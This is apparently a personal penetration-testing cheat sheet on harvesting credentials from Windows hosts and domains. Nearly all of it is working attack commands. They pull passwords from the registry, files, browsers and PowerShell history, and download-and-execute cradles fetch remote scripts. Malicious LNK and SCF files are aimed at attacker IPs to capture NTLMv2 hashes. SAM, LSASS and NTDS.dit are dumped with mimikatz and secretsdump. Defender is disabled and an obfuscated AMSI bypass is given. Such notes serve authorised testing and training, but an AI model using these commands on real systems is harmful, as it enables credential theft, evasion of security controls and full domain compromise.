HacktheboxGithub

Credentials Attacks On Windows

Here are some other places we should keep in mind when credential hunting:

  • Powershell history files

  • Passwords in Group Policy in the SYSVOL share

  • Passwords in scripts in the SYSVOL share

  • Password in scripts on IT shares

  • Passwords in web.config files on dev machines and IT shares

  • unattend.xml

  • Passwords in the AD user or computer description fields

  • KeePass databases --> pull hash, crack and get loads of access.

  • Found on user systems and shares

  • Files such as pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, Sharepoint

Repositories:

LogoGitHub - SnaffCon/Snaffler: a tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax )GitHub
LogoGitHub - GhostPack/SharpDPAPI: SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.GitHub
LogoGitHub - AlessandroZ/LaZagne: Credentials recovery projectGitHub
LogoGitHub - dafthack/MailSniper: MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.GitHub
LogoGitHub - Arvanaghi/SessionGopher: SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.GitHub
LogoGitHub - DanMcInerney/net-creds: Sniffs sensitive data from interface or pcapGitHub
LogoGitHub - dievus/lnkbomb: Malicious shortcut generator for collecting NTLM hashes from insecure file shares.GitHub

Extract Credentials from browsers

PS C:\\htb> start lazagne.exe all
PS C:\\htb> .\\SharpChrome.exe logins /unprotect

Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials with SessionGopher

PS C:\\htb> Import-Module .\\SessionGopher.ps1
PS C:\\Tools> Invoke-SessionGopher -Target WINLPE-SRV01

Sniff passwords and hashes with net-creds

LogoGitHub - DanMcInerney/net-creds: Sniffs sensitive data from interface or pcapGitHub
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0

Search credentials on the registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Passwords in unattend.xml

C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Credentials on CMDKey

#Listing Saved Credentials
C:\\htb> cmdkey /list

PowerShell History File

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Powershell Transcript

C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt

Password in Alternate Data Stream

PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag

IIS Web config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Stealing cookies Firefox

#**Path:** %APPDATA%\\Mozilla\\Firefox\\Profiles\\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d

Stealing cookies Chromium

#**Path:** %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies
PS C:\\htb> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh>
arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\\htb> copy "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Network\\Cookies" "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Cookies"
PS C:\\htb> Invoke-SharpChromium -Command "cookies slack.com"

Get Clipboard data

PS C:\\htb> IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1>')
PS C:\\htb> Invoke-ClipboardLogger

Retrieve Putty Credentials from registry

PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions
PS C:\\htb> reg query HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\Sessions\\<value>

Retrieve password from Wireless

C:\\htb> netsh wlan show profile
C:\\htb> netsh wlan show profile <ssid-name> key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on

Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\\htb> Get-ChildItem -Path C:\\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\\htb> Get-ChildItem -Path "C:\\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line

Search for filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\\htb> dir \\confidentials.txt /s /p
PS C:\\htb> Get-ChildItem -Path C:\\ -Filter "confidentials.txt" -Recurse

Chrome Dictionary Files

PS C:\\htb> Get-Content 'C:\\Users\\htb-student\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Custom Dictionary.txt' | Select-String password

Create a malicious lnk file to steal NTLMv2 hashes

Intrusionz3r0@htb[/htb]$ python3 .\\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

Sticky notes

#Path: C:\\Users\\<user>\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal

PS C:\\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\\htb> cd .\\PSSQLite\\
PS C:\\htb> Import-Module .\\PSSQLite.psd1
PS C:\\htb> $db = 'C:\\Users\\htb-student\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite'
PS C:\\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Recover credentials on PowerShell scripts

First Option:

PS C:\\htb> $credential = Import-Clixml -Path 'C:\\scripts\\pass.xml'
PS C:\\htb> $credential.GetNetworkCredential().username
PS C:\\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!

Second Option

$user = "Administrator"
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
cred = New-Object System.Management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | Format-List

Monitoring for Process Command Lines

PS C:\\htb> IEX (iwr '<http://10.10.10.205/procmon.ps1>') 

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

Capture NTLMv2 through SCF files on windows

[Shell]
Command=2
IconFile=\\\\10.10.14.3\\share\\legit.ico
[Taskbar]
Command=ToggleDesktop

Generate Malicious Lnk files

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\\legit.lnk")
$lnk.TargetPath = "\\\\<attackerIP>\\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\\system32\\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Copying SAM SYSTEM and Security

C:\\WINDOWS\\system32> reg.exe save hklm\\sam C:\\sam.save
C:\\WINDOWS\\system32> reg.exe save hklm\\system C:\\system.save
C:\\WINDOWS\\system32> reg.exe save hklm\\security C:\\security.save

Dumping SAM and SYSTEM

Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16  save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL 
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam

Dump LSA

Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa

Dump lsass


#Finding LSASS PID in cmd
C:\\Windows\\system32> tasklist /svc

#Finding LSASS PID in Powershell
PS C:\\Windows\\system32>  Get-Process lsass
#----------------------------------------

#Create lssas file
PS C:\\Windows\\system32> rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 672 C:\\lsass.dmp full

#dump the lsass.dmp file.
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp 
C:\\Windows\\system32>  .\\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit

Dump lsass using RDP session

Dump NTDS.dit

To make a copy of the NTDS.dit file, we need local admin (Administrators group) or Domain Admin (Domain Admins group) (or equivalent) rights.


#List the localgroups
C:\\> net localgroup

#Check user permission.
C:\\> net user bwilliamson

#Check the shadow copy
C:\\> vssadmin CREATE SHADOW /For=C:

#Move the file.
C:\\> cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit

#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key

#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

# Fastest way to steal the NTDS.
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds

Mimikatz

Execute a PowerShell as Administrator, create an exclusion Path and disable AV.

PS C:\Users\maldev > Start-Process PowerShell_ISE -Verb RunAS
PS C:\Users\maldev > Add-MpPreference -ExclusionPath “C:\Temp”
PS C:\Users\maldev > Set-MpPreference -DisableRealTimeMonitoring $true
PS C:\Users\maldev > Import-Module C:\Temp\Invoke-Mimikatz.ps1

AMSI Bypass

Find more: amsi.fail

PS C:\Users\maldev > S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Disable LSA Protection with mimikatz

!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords

vault::cred #dump Credential Manager

lsadump::sam #dump the SAM

lsadump::cache #dump cached Domain credentials (these must be cracked, PTH doesn't work on mscache)
PreviousEnumerationNextKerberos

Last updated